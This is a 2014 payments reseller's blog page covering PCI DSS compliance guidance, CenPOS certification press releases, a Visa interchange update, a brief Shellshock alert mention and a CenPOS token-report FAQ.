PCI SECURITY STANDARDS COUNCIL PUBLISHES SECURITY AWARENESS GUIDANCE

pci security awareness guideOctober 30, 2014. In order for an organization to comply with PCI DSS Requirement 12.6, a formal security awareness program must be in place. There are many aspects to consider when meeting this requirement to develop or revitalize such a program. The best practices included in this information supplement are intended to be a starting point for organizations without a program in place,or as a minimum benchmark for those with existing programs that require revisions. Best Practices for Implementing Security Awareness Program v1.0, 25 pg PDF recommended for IT and PCI compliance leaders.

One of the biggest risks to an organization’s information security is often not a weakness in the technology control environment. Rather it is the action or inaction by employees and other personnel that can lead to security incidents.

The free guidance will help merchants establish security standards in their business.

 

3D Merchant Services Powered by CenPOS
2633 NE 26th Ave Metro South FloridaFL33064 USA 
 • 954-942-0483

PCI DSS version 3.0 : January 2015 Deadline Looms

PCI DSS 3.0 deadline

Merchants who submit annual SAQ’s can continue to validate compliance with 2.0 SAQs until January 1, 2015. If merchants annual validation occurs in December,they’re not mandated to validate with version 3.0 until December 2015.

Are you ready?  Every merchant is impacted by the update, which are considerable. The PCI DSS Quick Reference Guide is 40 pages so there will be no attempt to duplicate it here. Here’s some issues merchants mostly likely need to address:

  1. Maintain an inventory of system components that are in scope for PCI DSS and also further, protect devices from tampering. Merchants have to identify all software, hardware, networks, what it’s used for, why it’s needed. This is a difficult task for larger retail operations where equipment is regularly moved and replaced. To comply, there must be a plan to regularly inspect equipment with serial number verification.
  2. Ensure that related security policies and operational procedures are documented, in use, and known to all affected parties. Even if in place, rarely is the case where every employee is fully informed. Adding a component to HR employee reviews is the simplest way to initiate a system.
  3. Render PAN unreadable anywhere it is stored- the card number must be unreadable per 3.4.
  4. The CAV2/CVC2/CVV2/CID can never ever be stored. OK, this one is old, but it’s still abused so it’s being repeated again. It’s NOT OK to store if ‘for a while’.
  5. Control physical access for on-site personnel; access authorized and based on individual job function and revoked immediately upon termination.The vast majority of companies have little control over employee access by job function. Their equipment or software simply has too many limitations. Merchants need to micro manage what employees can do, and document each employees interaction ( who processed what transaction etc.)
Goals of the PCI Data Security Standard
  • Build and maintain a secure network
  • Protect cardholder data
  • Maintain a vulnerability management program
  • Implement strong access control measures
  • Regularly monitor and test networks
  • Maintain an information security policy
PCI: IS AN ongoing 3-step process
  • Assess – identifying cardholder data, taking an inventory of your IT assets and business processes for payment card processing, and analyzing them for vulnerabilities.
  • Remediate – fixing vulnerabilities and not storing cardholder data unless you need it.
  • Report – compiling and submitting required reports to the acquiring bank and card brands you do business with.

CenPOS Certifies to Caribbean Credit Card Corporation

logo cenpos Miami, FL (PRWEB) October 27, 2014

Today, CenPOS proudly announces a new certification to Caribbean Credit Card Corporation. The certification includes card present, card not present, e-commerce, and mobile processing. Merchants residing in countries where Caribbean Credit Card Corporation has a processing relationship with local banks are now able to take advantage of the CenPOS suite of products and services, including but not limited to: Mobile processing, Electronic Bill Presentment and Payment, integrated shopping carts, Point-to-Point encryption and tokenization. Cross border merchants are now able to easily manage their business payment needs through one single payment platform. CenPOS provides businesses across the globe with an omni-channel payment platform allowing the business communities to better engage their clients and allowing them to pay from anywhere, anytime and however they want to pay.

“We are very excited with this new certification as it bring us closer to our quest to provide our clients with global processing solutions with a world class platform,” said German Gonzalez, Chief Technology Officer and Co-Founder of CenPOS. “CenPOS will continue to add new certifications that are strategic and complimentary to our current product offering, but more importantly, certifications that are required by our valued clients,” added Gonzalez.

CenPOS is now able to provide core payment processing services in the following Caribbean countries:

Anguilla, Saint Kitts and Nevis, Antigua and Barbuda, Saint Lucia, Saint Vincent , Guyana, Barbados, Dominica, Grenada, Suriname, and Montserrat

About CenPOS

CenPOS is a merchant-centric, end-to-end payments engine that drives enterprise-class solutions for businesses, saving them time and money, while improving their customer engagement. CenPOS’ secure, cloud-based solution optimizes acceptance for all payment types across multiple channels without disrupting the merchant’s banking relationships. For additional information please call 877.630.7960.

###

3D Merchant Services is an authorized CenPOS Reseller, Global Sales (954) 942-0483.

Visa interchange rate October 2014 release

The Visa Fall 2014 interchange reimbursement rate release is now available for PDF download. At a glance, I didn’t spot any changes to rates, following broad changes and increases for business to business since April 2013.

The transaction and volume minimum did increase for the Credit Threshold, but the maximum chargeback ratio remains the same at 0.020%.

credit threshold visa

New higher minimums for credit performance threshold.

For merchants, no news is good news! If your company is business to business, managing interchange is critically important. The Business Electronic Interchange Reimbursement (EIRF) Fee increased from 2.75% to 2.95% in the last year. Merchants can avoid EIRF and Standard with improved interchange qualification management.

Click here for handy web page with links for to all credit card brand rates. As of October 21, 2014, MasterCard has not released an update for Fall, however, the spring update is labeled 2014 – 2015, so perhaps there will not be one.

US Homeland Security Alerts: “Shellshock” Vulnerability

US computer emergency readiness team Over one thousand merchants have been impacted by issues the US Computer Emergency Readiness Team has issued alerts for.

GNU Bourne-Again Shell (Bash) ‘Shellshock’ Vulnerability is a critical vulnerability reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple’s Mac OS X.

PCI Security council released an alert for merchants https://www.pcisecuritystandards.org/pdfs/14_10_15%20PCI%20SSC%20Bulletin%20on%20Shellshock_Final.pdf

 

Identify transaction using token vs without token : CenPOS FAQ

tokenization for credit card sale cenpos

Segment of receipt that identifies whether a token was used for credit card transaction via CenPOS.

Is there a CenPOS report that I can print that shows if a token was used rather than a credit card number was keyed?  Yes, by pulling a Repeat Sale report. All transactions using a token are sent with the “Repeat Sale” process indicator, in accordance with card acceptance rules. For on demand reports, login to the virtual terminal.

  • Choose Reports> Reprint to include all attempted transactions.
  • Choose Reports> Transactions to include only settled transactions.
cenpos reports field change view

If you don’t see the “Processed” column in reports, click the show/hide columns button shown  at far right.

report fields checkboxes cenpos

To view only transactions in which a token was used, enter "repeat" in the filter field

To view only transactions in which a token was used, enter “repeat” in the filter field.

Use the icons in the upper right of report to print or export and paste into excel. Do you need this report regularly? With the executive dashboard report writer, create a report with any criteria and have it automatically delivered to any email group on any schedule.

 

CenPOS Achieves SSAE 16 Type II Compliance

logo cenpos Miami, FL (PRWEB) September 29, 2014

CenPOS Enhances Security and Safety of Cardholder Data in Cloud-based Engine with SSAE 16 type II compliance

CenPOS, a leading payment-processing provider with data center facilities in Miami, Florida and Culpepper, Virginia, announced today that it has achieved the Statement on Standards for Attestation Engagements (SSAE) 16 type II standards compliance. The SSAE 16 Type II compliance demonstrates CenPOS’s ability to exceed security, compliance and safety-related requirements for controls and safeguards when hosting customer data.

Critical components to obtaining this certification include the ability to assess and reduce risk, propel business continuity and provide customers with controlled security measures. The assessment process involves the completion of SOC 1 reports, compiled by the American Institute of Certified Public Accountants (AICPA). These standardized reports review multiple aspects of the organization, including CenPOS‘s internal control over financial reporting (ICFR), security, availability, processing integrity, confidentiality and privacy in accordance with AICPA’s Trust Service Principles and AT Section 101.

“Exceeding SSAE 16 requirements across all of our datacenters as well as SOC requirements across our cloud and managed services platform, further demonstrates our commitment to the highest standards of operational excellence and consistently deliver best-of-breed, intelligent datacenter solutions to all our customers,” comments German Gonzalez, Chief Technology Officer and Co-founder.

About CenPOS
CenPOS is a merchant-centric, end-to-end payments engine that drives enterprise-class solutions for businesses, saving them time and money, while improving their customer engagement. CenPOS’ secure, cloud-based solution optimizes acceptance for all payment types across multiple channels without disrupting the merchant’s banking relationships.

###

3D Merchant Services is an authorized CenPOS Reseller, Global Sales (954) 942-0483.